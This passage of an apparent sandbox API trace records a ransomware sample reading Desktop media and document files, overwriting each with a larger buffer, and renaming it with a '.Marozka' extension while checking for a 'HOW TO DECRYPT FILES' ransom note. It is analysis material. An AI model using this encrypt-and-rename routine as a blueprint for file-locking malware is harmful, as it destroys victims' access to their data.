ftCreationTime.dwLowDateTime=0x2096e090, ftCreationTime.dwHighDateTime=0x1d4d4cd, ftLastAccessTime.dwLowDateTime=0x23c44c70, ftLastAccessTime.dwHighDateTime=0x1d4c7cc, ftLastWriteTime.dwLowDateTime=0xdda593b9, ftLastWriteTime.dwHighDateTime=0x1d4e6cd, nFileSizeHigh=0x0, nFileSizeLow=0xa0c0)) returned 1 [0045.151] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5bea90) returned 1 [0045.151] MoveFileW (lpExistingFileName="C:\\Users\\FD1HVy\\Desktop\\LCFIrI.bmp" (normalized: "c:\\users\\fd1hvy\\desktop\\lcfiri.bmp"), lpNewFileName="C:\\Users\\FD1HVy\\Desktop\\LCFIrI.bmp.Marozka" (normalized: "c:\\users\\fd1hvy\\desktop\\lcfiri.bmp.marozka")) returned 1 [0045.152] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\lHucz_AFxs.avi", nBufferLength=0x105, lpBuffer=0x5be4d0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop\\lHucz_AFxs.avi", lpFilePart=0x0) returned 0x26 [0045.152] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5bea14) returned 1 [0045.152] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\lHucz_AFxs.avi" (normalized: "c:\\users\\fd1hvy\\desktop\\lhucz_afxs.avi"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x2e0 [0045.152] GetFileType (hFile=0x2e0) returned 0x1 [0045.152] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5bea10) returned 1 [0045.152] GetFileType (hFile=0x2e0) returned 0x1 [0045.152] GetFileSize (in: hFile=0x2e0, lpFileSizeHigh=0x5beb10 | out: lpFileSizeHigh=0x5beb10*=0x0) returned 0x241c [0045.152] ReadFile (in: hFile=0x2e0, lpBuffer=0x29f7d04, nNumberOfBytesToRead=0x241c, lpNumberOfBytesRead=0x5beabc, lpOverlapped=0x0 | out: lpBuffer=0x29f7d04*, lpNumberOfBytesRead=0x5beabc*=0x241c, lpOverlapped=0x0) returned 1 [0045.152] CloseHandle (hObject=0x2e0) returned 1 [0045.208] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\HOW TO DECRYPT FILES.txt.Marozka", nBufferLength=0x105, lpBuffer=0x5be5d4, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop\\HOW TO DECRYPT FILES.txt.Marozka", lpFilePart=0x0) returned 0x38 [0045.208] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5bea88) returned 1 [0045.208] GetFileAttributesExW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\HOW TO DECRYPT FILES.txt.Marozka" (normalized: "c:\\users\\fd1hvy\\desktop\\how to decrypt files.txt.marozka"), fInfoLevelId=0x0, lpFileInformation=0x5beb04 | out: lpFileInformation=0x5beb04*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0045.209] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5bea84) returned 1 [0045.209] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\lHucz_AFxs.avi", nBufferLength=0x105, lpBuffer=0x5be4bc, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop\\lHucz_AFxs.avi", lpFilePart=0x0) returned 0x26 [0045.209] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5bea00) returned 1 [0045.209] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\lHucz_AFxs.avi" (normalized: "c:\\users\\fd1hvy\\desktop\\lhucz_afxs.avi"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x2e0 [0045.210] GetFileType (hFile=0x2e0) returned 0x1 [0045.210] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5be9fc) returned 1 [0045.210] GetFileType (hFile=0x2e0) returned 0x1 [0045.210] WriteFile (in: hFile=0x2e0, lpBuffer=0x2a4ff8c*, nNumberOfBytesToWrite=0x2420, lpNumberOfBytesWritten=0x5beab0, lpOverlapped=0x0 | out: lpBuffer=0x2a4ff8c*, lpNumberOfBytesWritten=0x5beab0*=0x2420, lpOverlapped=0x0) returned 1 [0045.211] CloseHandle (hObject=0x2e0) returned 1 [0045.217] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\lHucz_AFxs.avi", nBufferLength=0x105, lpBuffer=0x5be5e0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop\\lHucz_AFxs.avi", lpFilePart=0x0) returned 0x26 [0045.217] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\lHucz_AFxs.avi.Marozka", nBufferLength=0x105, lpBuffer=0x5be5e0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop\\lHucz_AFxs.avi.Marozka", lpFilePart=0x0) returned 0x2e [0045.217] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5bea94) returned 1 [0045.218] GetFileAttributesExW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\lHucz_AFxs.avi" (normalized: "c:\\users\\fd1hvy\\desktop\\lhucz_afxs.avi"), fInfoLevelId=0x0, lpFileInformation=0x5beb10 | out: lpFileInformation=0x5beb10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x95afb7a0, ftCreationTime.dwHighDateTime=0x1d4d273, ftLastAccessTime.dwLowDateTime=0xa12c28e0, ftLastAccessTime.dwHighDateTime=0x1d4c966, ftLastWriteTime.dwLowDateTime=0xddaf3c08, ftLastWriteTime.dwHighDateTime=0x1d4e6cd, nFileSizeHigh=0x0, nFileSizeLow=0x2420)) returned 1 [0045.218] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5bea90) returned 1 [0045.218] MoveFileW (lpExistingFileName="C:\\Users\\FD1HVy\\Desktop\\lHucz_AFxs.avi" (normalized: "c:\\users\\fd1hvy\\desktop\\lhucz_afxs.avi"), lpNewFileName="C:\\Users\\FD1HVy\\Desktop\\lHucz_AFxs.avi.Marozka" (normalized: "c:\\users\\fd1hvy\\desktop\\lhucz_afxs.avi.marozka")) returned 1 [0045.218] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\ltUXfNxT5.mkv", nBufferLength=0x105, lpBuffer=0x5be4d0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop\\ltUXfNxT5.mkv", lpFilePart=0x0) returned 0x25 [0045.218] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5bea14) returned 1 [0045.218] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\ltUXfNxT5.mkv" (normalized: "c:\\users\\fd1hvy\\desktop\\ltuxfnxt5.mkv"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x2e0 [0045.219] GetFileType (hFile=0x2e0) returned 0x1 [0045.219] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5bea10) returned 1 [0045.219] GetFileType (hFile=0x2e0) returned 0x1 [0045.219] GetFileSize (in: hFile=0x2e0, lpFileSizeHigh=0x5beb10 | out: lpFileSizeHigh=0x5beb10*=0x0) returned 0x1679c [0045.219] ReadFile (in: hFile=0x2e0, lpBuffer=0x37e19f8, nNumberOfBytesToRead=0x1679c, lpNumberOfBytesRead=0x5beabc, lpOverlapped=0x0 | out: lpBuffer=0x37e19f8*, lpNumberOfBytesRead=0x5beabc*=0x1679c, lpOverlapped=0x0) returned 1 [0045.221] CloseHandle (hObject=0x2e0) returned 1 [0045.379] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\HOW TO DECRYPT FILES.txt.Marozka", nBufferLength=0x105, lpBuffer=0x5be5d4, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop\\HOW TO DECRYPT FILES.txt.Marozka", lpFilePart=0x0) returned 0x38 [0045.380] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5bea88) returned 1 [0045.380] GetFileAttributesExW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\HOW TO DECRYPT FILES.txt.Marozka" (normalized: "c:\\users\\fd1hvy\\desktop\\how to decrypt files.txt.marozka"), fInfoLevelId=0x0, lpFileInformation=0x5beb04 | out: lpFileInformation=0x5beb04*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0045.380] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5bea84) returned 1 [0045.380] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\ltUXfNxT5.mkv", nBufferLength=0x105, lpBuffer=0x5be4bc, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop\\ltUXfNxT5.mkv", lpFilePart=0x0) returned 0x25 [0045.380] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5bea00) returned 1 [0045.380] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\ltUXfNxT5.mkv" (normalized: "c:\\users\\fd1hvy\\desktop\\ltuxfnxt5.mkv"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x2e0 [0045.382] GetFileType (hFile=0x2e0) returned 0x1 [0045.382] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5be9fc) returned 1 [0045.382] GetFileType (hFile=0x2e0) returned 0x1 [0045.382] WriteFile (in: hFile=0x2e0, lpBuffer=0x3852050*, nNumberOfBytesToWrite=0x167a0, lpNumberOfBytesWritten=0x5beab0, lpOverlapped=0x0 | out: lpBuffer=0x3852050*, lpNumberOfBytesWritten=0x5beab0*=0x167a0, lpOverlapped=0x0) returned 1 [0045.394] CloseHandle (hObject=0x2e0) returned 1 [0045.396] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\ltUXfNxT5.mkv", nBufferLength=0x105, lpBuffer=0x5be5e0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop\\ltUXfNxT5.mkv", lpFilePart=0x0) returned 0x25 [0045.397] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\ltUXfNxT5.mkv.Marozka", nBufferLength=0x105, lpBuffer=0x5be5e0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop\\ltUXfNxT5.mkv.Marozka", lpFilePart=0x0) returned 0x2d [0045.397] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5bea94) returned 1 [0045.397] GetFileAttributesExW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\ltUXfNxT5.mkv" (normalized: "c:\\users\\fd1hvy\\desktop\\ltuxfnxt5.mkv"), fInfoLevelId=0x0, lpFileInformation=0x5beb10 | out: lpFileInformation=0x5beb10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x648f0e20, ftCreationTime.dwHighDateTime=0x1d4c605, ftLastAccessTime.dwLowDateTime=0x60d211d0, ftLastAccessTime.dwHighDateTime=0x1d4ce37, ftLastWriteTime.dwLowDateTime=0xddc92cdf, ftLastWriteTime.dwHighDateTime=0x1d4e6cd, nFileSizeHigh=0x0, nFileSizeLow=0x167a0)) returned 1 [0045.397] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5bea90) returned 1 [0045.397] MoveFileW (lpExistingFileName="C:\\Users\\FD1HVy\\Desktop\\ltUXfNxT5.mkv" (normalized: "c:\\users\\fd1hvy\\desktop\\ltuxfnxt5.mkv"), lpNewFileName="C:\\Users\\FD1HVy\\Desktop\\ltUXfNxT5.mkv.Marozka" (normalized: "c:\\users\\fd1hvy\\desktop\\ltuxfnxt5.mkv.marozka")) returned 1 [0045.398] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\r2eIg.odt", nBufferLength=0x105, lpBuffer=0x5be4d0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop\\r2eIg.odt", lpFilePart=0x0) returned 0x21 [0045.398] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5bea14) returned 1 [0045.398] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\r2eIg.odt" (normalized: "c:\\users\\fd1hvy\\desktop\\r2eig.odt"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x2e0 [0045.398] GetFileType (hFile=0x2e0) returned 0x1 [0045.398] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5bea10) returned 1 [0045.398] GetFileType (hFile=0x2e0) returned 0x1 [0045.398] GetFileSize (in: hFile=0x2e0, lpFileSizeHigh=0x5beb10 | out: lpFileSizeHigh=0x5beb10*=0x0) returned 0xa275 [0045.398] ReadFile (in: hFile=0x2e0, lpBuffer=0x264d7e8, nNumberOfBytesToRead=0xa275, lpNumberOfBytesRead=0x5beabc, lpOverlapped=0x0 | out: lpBuffer=0x264d7e8*, lpNumberOfBytesRead=0x5beabc*=0xa275, lpOverlapped=0x0) returned 1 [0045.398] CloseHandle (hObject=0x2e0) returned 1 [0045.422] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\HOW TO DECRYPT FILES.txt.Marozka", nBufferLength=0x105, lpBuffer=0x5be5d4, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop\\HOW TO DECRYPT FILES.txt.Marozka", lpFilePart=0x0) returned 0x38 [0045.422] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5bea88) returned 1 [0045.422] GetFileAttributesExW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\HOW TO DECRYPT FILES.txt.Marozka" (normalized: "c:\\users\\fd1hvy\\desktop\\how to decrypt files.txt.marozka"), fInfoLevelId=0x0, lpFileInformation=0x5beb04 | out: lpFileInformation=0x5beb04*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0045.423] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5bea84) returned 1 [0045.423] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\r2eIg.odt", nBufferLength=0x105, lpBuffer=0x5be4bc, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop\\r2eIg.odt", lpFilePart=0x0) returned 0x21 [0045.423] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5bea00) returned 1 [0045.423] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\r2eIg.odt" (normalized: "c:\\users\\fd1hvy\\desktop\\r2eig.odt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x2e0 [0045.424] GetFileType (hFile=0x2e0) returned 0x1 [0045.424] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5be9fc) returned 1 [0045.424] GetFileType (hFile=0x2e0) returned 0x1 [0045.424] WriteFile (in: hFile=0x2e0, lpBuffer=0x26cd3b0*, nNumberOfBytesToWrite=0xa280, lpNumberOfBytesWritten=0x5beab0, lpOverlapped=0x0 | out: lpBuffer=0x26cd3b0*, lpNumberOfBytesWritten=0x5beab0*=0xa280, lpOverlapped=0x0) returned 1 [0045.426] CloseHandle (hObject=0x2e0) returned 1 [0045.430] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\r2eIg.odt", nBufferLength=0x105, lpBuffer=0x5be5e0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop\\r2eIg.odt", lpFilePart=0x0) returned 0x21 [0045.430] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\r2eIg.odt.Marozka", nBufferLength=0x105, lpBuffer=0x5be5e0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop\\r2eIg.odt.Marozka", lpFilePart=0x0) returned 0x29 [0045.430] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5bea94) returned 1 [0045.430] GetFileAttributesExW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\r2eIg.odt" (normalized: "c:\\users\\fd1hvy\\desktop\\r2eig.odt"), fInfoLevelId=0x0, lpFileInformation=0x5beb10 | out: lpFileInformation=0x5beb10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe697ac20, ftCreationTime.dwHighDateTime=0x1d4ccdf, ftLastAccessTime.dwLowDateTime=0x96579420, ftLastAccessTime.dwHighDateTime=0x1d4cb93, ftLastWriteTime.dwLowDateTime=0xddce4a13, ftLastWriteTime.dwHighDateTime=0x1d4e6cd, nFileSizeHigh=0x0, nFileSizeLow=0xa280)) returned 1 [0045.430] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5bea90) returned 1 [0045.430] MoveFileW (lpExistingFileName="C:\\Users\\FD1HVy\\Desktop\\r2eIg.odt" (normalized: "c:\\users\\fd1hvy\\desktop\\r2eig.odt"), lpNewFileName="C:\\Users\\FD1HVy\\Desktop\\r2eIg.odt.Marozka" (normalized: "c:\\users\\fd1hvy\\desktop\\r2eig.odt.marozka")) returned 1 [0045.464] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\Rk0HSSvwECd.png", nBufferLength=0x105, lpBuffer=0x5be4d0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop\\Rk0HSSvwECd.png", lpFilePart=0x0) returned 0x27 [0045.465] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5bea14) returned 1 [0045.465] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\Rk0HSSvwECd.png" (normalized: "c:\\users\\fd1hvy\\desktop\\rk0hssvwecd.png"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x2e0 [0045.465] GetFileType (hFile=0x2e0) returned 0x1 [0045.465] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5bea10) returned 1 [0045.465] GetFileType (hFile=0x2e0) returned 0x1 [0045.465] GetFileSize (in: hFile=0x2e0, lpFileSizeHigh=0x5beb10 | out: lpFileSizeHigh=0x5beb10*=0x0) returned 0x1339e [0045.465] ReadFile (in: hFile=0x2e0, lpBuffer=0x26d7a8c, nNumberOfBytesToRead=0x1339e, lpNumberOfBytesRead=0x5beabc, lpOverlapped=0x0 | out: lpBuffer=0x26d7a8c*, lpNumberOfBytesRead=0x5beabc*=0x1339e, lpOverlapped=0x0) returned 1 [0045.466] CloseHandle (hObject=0x2e0) returned 1 [0045.490] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\HOW TO DECRYPT FILES.txt.Marozka", nBufferLength=0x105, lpBuffer=0x5be5d4, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop\\HOW TO DECRYPT FILES.txt.Marozka", lpFilePart=0x0) returned 0x38 [0045.490] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5bea88) returned 1 [0045.490] GetFileAttributesExW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\HOW TO DECRYPT FILES.txt.Marozka" (normalized: "c:\\users\\fd1hvy\\desktop\\how to decrypt files.txt.marozka"), fInfoLevelId=0x0, lpFileInformation=0x5beb04 | out: lpFileInformation=0x5beb04*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0045.491] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5bea84) returned 1 [0045.491] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\Rk0HSSvwECd.png", nBufferLength=0x105, lpBuffer=0x5be4bc, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop\\Rk0HSSvwECd.png", lpFilePart=0x0) returned 0x27 [0045.491] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5bea00) returned 1 [0045.491] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\Rk0HSSvwECd.png" (normalized: "c:\\users\\fd1hvy\\desktop\\rk0hssvwecd.png"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x2e0 [0045.492] GetFileType (hFile=0x2e0) returned 0x1 [0045.492] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5be9fc) returned 1 [0045.492] GetFileType (hFile=0x2e0) returned 0x1 [0045.492] WriteFile (in: hFile=0x2e0, lpBuffer=0x275e36c*, nNumberOfBytesToWrite=0x133a0, lpNumberOfBytesWritten=0x5beab0, lpOverlapped=0x0 | out: lpBuffer=0x275e36c*, lpNumberOfBytesWritten=0x5beab0*=0x133a0, lpOverlapped=0x0) returned 1 [0045.495] CloseHandle (hObject=0x2e0) returned 1 [0045.506] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\Rk0HSSvwECd.png", nBufferLength=0x105, lpBuffer=0x5be5e0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop\\Rk0HSSvwECd.png", lpFilePart=0x0) returned 0x27 [0045.506] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\Rk0HSSvwECd.png.Marozka", nBufferLength=0x105, lpBuffer=0x5be5e0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop\\Rk0HSSvwECd.png.Marozka", lpFilePart=0x0) returned 0x2f [0045.506] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5bea94) returned 1 [0045.506] GetFileAttributesExW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\Rk0HSSvwECd.png" (normalized: "c:\\users\\fd1hvy\\desktop\\rk0hssvwecd.png"), fInfoLevelId=0x0, lpFileInformation=0x5beb10 | out: lpFileInformation=0x5beb10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x34e95690, ftCreationTime.dwHighDateTime=0x1d4ccf8, ftLastAccessTime.dwLowDateTime=0x5fc93970, ftLastAccessTime.dwHighDateTime=0x1d4ce9c, ftLastWriteTime.dwLowDateTime=0xddd9dd54, ftLastWriteTime.dwHighDateTime=0x1d4e6cd, nFileSizeHigh=0x0, nFileSizeLow=0x133a0)) returned 1 [0045.506] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5bea90) returned 1 [0045.506] MoveFileW (lpExistingFileName="C:\\Users\\FD1HVy\\Desktop\\Rk0HSSvwECd.png" (normalized: "c:\\users\\fd1hvy\\desktop\\rk0hssvwecd.png"), lpNewFileName="C:\\Users\\FD1HVy\\Desktop\\Rk0HSSvwECd.png.Marozka" (normalized: "c:\\users\\fd1hvy\\desktop\\rk0hssvwecd.png.marozka")) returned 1 [0045.507] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\Sv5MOmXZ4GcbjflYw.mp3", nBufferLength=0x105, lpBuffer=0x5be4d0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop\\Sv5MOmXZ4GcbjflYw.mp3", lpFilePart=0x0) returned 0x2d [0045.507] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5bea14) returned 1 [0045.507] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\Sv5MOmXZ4GcbjflYw.mp3" (normalized: "c:\\users\\fd1hvy\\desktop\\sv5momxz4gcbjflyw.mp3"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x2e0 [0045.507] GetFileType (hFile=0x2e0) returned 0x1 [0045.507] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5bea10) returned 1 [0045.507] GetFileType (hFile=0x2e0) returned 0x1 [0045.507] GetFileSize (in: hFile=0x2e0, lpFileSizeHigh=0x5beb10 | out: lpFileSizeHigh=0x5beb10*=0x0) returned 0x237b [0045.507] ReadFile (in: hFile=0x2e0, lpBuffer=0x2771bbc, nNumberOfBytesToRead=0x237b, lpNumberOfBytesRead=0x5beabc, lpOverlapped=0x0 | out: lpBuffer=0x2771bbc*, lpNumberOfBytesRead=0x5beabc*=0x237b, lpOverlapped=0x0) returned 1 [0045.508] CloseHandle (hObject=0x2e0) returned 1 [0045.540] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\HOW TO DECRYPT FILES.txt.Marozka", nBufferLength=0x105, lpBuffer=0x5be5d4, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop\\HOW TO DECRYPT FILES.txt.Marozka", lpFilePart=0x0) returned 0x38 [0045.540] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5bea88) returned 1 [0045.540] GetFileAttributesExW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\HOW TO DECRYPT FILES.txt.Marozka" (normalized: "c:\\users\\fd1hvy\\desktop\\how to decrypt files.txt.marozka"), fInfoLevelId=0x0, lpFileInformation=0x5beb04 | out: lpFileInformation=0x5beb04*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0045.540] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5bea84) returned 1 [0045.541] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\Sv5MOmXZ4GcbjflYw.mp3", nBufferLength=0x105, lpBuffer=0x5be4bc, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop\\Sv5MOmXZ4GcbjflYw.mp3", lpFilePart=0x0) returned 0x2d [0045.541] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5bea00) returned 1 [0045.541] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\Sv5MOmXZ4GcbjflYw.mp3" (normalized: "c:\\users\\fd1hvy\\desktop\\sv5momxz4gcbjflyw.mp3"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x2e0 [0045.542] GetFileType (hFile=0x2e0) returned 0x1 [0045.542] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5be9fc) returned 1 [0045.542] GetFileType (hFile=0x2e0) returned 0x1 [0045.542] WriteFile (in: hFile=0x2e0, lpBuffer=0x27c9b28*, nNumberOfBytesToWrite=0x2380, lpNumberOfBytesWritten=0x5beab0, lpOverlapped=0x0 | out: lpBuffer=0x27c9b28*, lpNumberOfBytesWritten=0x5beab0*=0x2380, lpOverlapped=0x0) returned 1 [0045.543] CloseHandle (hObject=0x2e0) returned 1 [0045.549] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\Sv5MOmXZ4GcbjflYw.mp3", nBufferLength=0x105, lpBuffer=0x5be5e0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop\\Sv5MOmXZ4GcbjflYw.mp3", lpFilePart=0x0) returned 0x2d [0045.549] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\Sv5MOmXZ4GcbjflYw.mp3.Marozka", nBufferLength=0x105, lpBuffer=0x5be5e0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop\\Sv5MOmXZ4GcbjflYw.mp3.Marozka", lpFilePart=0x0) returned 0x35 [0045.549] SetThreadErrorMode 